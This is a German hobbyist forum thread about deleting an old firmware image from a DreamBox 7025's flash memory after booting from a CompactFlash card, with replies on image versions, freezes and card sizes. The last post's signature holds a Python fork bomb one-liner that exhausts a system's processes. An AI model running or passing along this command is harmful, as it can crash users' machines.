Flashspeicher löschen, wie?

    • Flashspeicher löschen, wie?

      Hallo,

      ich habe folgendes Problem:

      da das neue Image Release von Newnigma2 nur knapp auf die DB passt, habe ich es auf eine CF Karte ausgelagert. Es ist alles soweit in Ordnung. Die Box bootet von der CF Karte.

      Aber das Image liegt nun auch im Flashspeicher. Kann ich das Image aus dem Flashspeicher löschen? Oder nicht? (Es wird ja nicht mehr gebraucht.) Um Platz für andere Sachen zu machen.

      Und wie, kann ich das Image aus dem Flash löschen?

      Vielen Dank für eure Hilfe.


      Grüsse, Birdman
      DreamBox 7025
    • Wenn man von CF bootet und ein Update startet wird logischerweise auch das Image auf der CF aktualisiert.

      Sicher kann man den Flash Speicher dann auch anders nutzen,, nur was möchte man mit den 22MB anfangen wenn man mehrere GB auf der CF hat.
    • ich hätte da das oozoon image draufgemacht, damit ich im ernstfall fernsehen kann.
      das läuft irgendwie immer, das 3.2 freezt regelmässig, daher hab ich nun auch eine cf bestellt, weils per default schon zuviele Plugins drin hat, die sich auch nicht übers Menü deinstallieren lassen, bzw, schon, sind aber nach reboot noch da.
      Kann sein daß der Fehler weg ist, wenn alles auf der groß genugen CF läuft.


      gruss
      r
    • Im 3.2 sind auch alte fehlerhafte Treiber, deshalb gibt es ja auch das 3.2.2
      Ein Update tut immer gut.

      Außerdem haben wir auch einen aktuellen Feed der nennt sich unstable.
      Ich bezweifle das mit dem 3.2.2 oder unstable deine Box ebenfalls einfriert, da das ein bekanntes Problem mit den alten Treibern ist.

      Es wäre vielleicht schlau gewesen direkt nach einer Problemlösung zu fragen und nicht wie man ein anderes Image installiert.
    • 1. will ich immer noch wissen wie man den flash löscht, schreibs halt mal her, dann sind mind. 2 glücklich.

      2. hab ich schon gelesen wie man zur 3.2.2 kommt, aber nach dem Update ist das Image genau so große, daß meine 7025 schon ohne zusätzliche Plugins freezt und auch dann noch in der bootschleife hängen bleibt. Also wird erst nach dem Flash auf CF das update möglich sein. das nackerte 3.2 scheint zu laufen, geht auch auf ne 128mb cf, aber die ist dann auch schon knallvoll.

      3. Die Lösung meines anderen Problems WAR das installieren eines anderen Images, das nicht schon irgendwelche platzfressende Plugins drin hat, damit ich wenigstens ein wenig fernsehen konnte... ich weiss nicht warum entschieden wurde, das 7025er image so zu machen. An sich sollte man das Grundimage so klein wie möglich machen?!
      Dass der Speicher knapp wird weiss man schon seit, naja, 2007?

      4. Glaubst Du eh nicht.

      5. Such ich wirklich schon seit 2 Abenden in der Doku/Wiki, wie groß eine CF Card sein muss, welche sicher funktioniert, ob man gleich ext3 nehmen soll,..... da hab ich halt mal eine 2GB bestellt, die wirds tun müssen fürn anfang.

      gruss
      r
    • 1. Installiere die ein unstable image das wird mit den selben sourcen gebaut wie die oozoon experimental.

      2. Außerdem haben wir da einiges entfernt so das das 7025Image nicht mehr so groß ist.
      3. Nachdem du dir das Image auf CF installiert hast ist es allerdings egal wie groß das Image ist.
      4. Die Box hat 22 oder 26MB flash es wird keine CF Karte zukaufen geben die so klein ist.

      5. Es ist auch vollkommen egal welches Dateisystem auf der CF ist das wird vom CF-Installer automatisiert erstellt.

      6. Denke ich nicht dran für so etwas support zu geben.
    • 4. Ja, es stand auch irgendwo, daß man mindestens 512mb nehmen sollte.
      Also eher was die sinnvolle Untergrenze ist.

      5. Im Devicemanager gibts eine Auswahl, bin davon ausgegangen, daß das vorher notwendig ist, funktioniert hat es.

      6. Dachte dafür gibts einen technischen Grund, aber da hab ich nicht weiter gesucht.

      7. Erst hab ich so eine Antwort auf die Frage erwartet:

      Sorry Jungs, kein Support für Flashoperationen von Anwendern. Lasst das mal lieber und kauft ne 2. CF mit 1Gb - 4GB ..... und macht da noch was anderes drauf was ihr wollt.


      Wenn das mit der CF gut läuft komm ich damit auch klar noch eine dazuzulegen.


      Jetzt seh ich grad das Thema zu den 7025 Images, nun kann ich weitermachen, danke.

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von suarez ()

    • aktuelle Images für die dm7025

      Wenn du dir ein anderes Image in den flash installierst dann wirst du nicht mehr von CF booten können.
      In dem anderen Image gibt es auch keine Auswahl wo man das booten von CF aktivieren kann.
      Deshalb habe ich auch keine Lust so etwas zu supporten.

      Es wäre wie gesagt am besten wenn du dir gleich ein aktuelles unstable flashst.

      Ich habe gerade noch einmal bei Alternate nachgesehen da kann man nirgends eine CompactFlash Karte bestellen die kleiner als 4GB ist.

      Kaufe dir einfach irgendeine CF die dein Budget nicht sprengt.
    • Es gibt so viele verschiedene Speichermedien.
      Einfach bestellen und in die Box stecken, wenn sie funktioniert dann sind die 2GB mehr als ausreichend.
      Wenn sie nicht funktioniert dann schickst du sie einfach zurück und bestellst eine andere.

      Im Prinzip kann man das Image auf unter 20MB abspecken und es ist lauffähig.
      Diese Karte hat über 2000MB, du könntest dir sämtliche Pakete von unserem Feed installieren und sie würde nicht voll werden.
    • Original von suarez
      hi,

      genau das hab ich mich auch gefragt, ob man das machen könnte.

      Wenn ich von CF boote, geht dann auch das Update auf das CF-Image, denk schon, oder?

      gruss
      ja klar geht das alles auf den cf :]
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !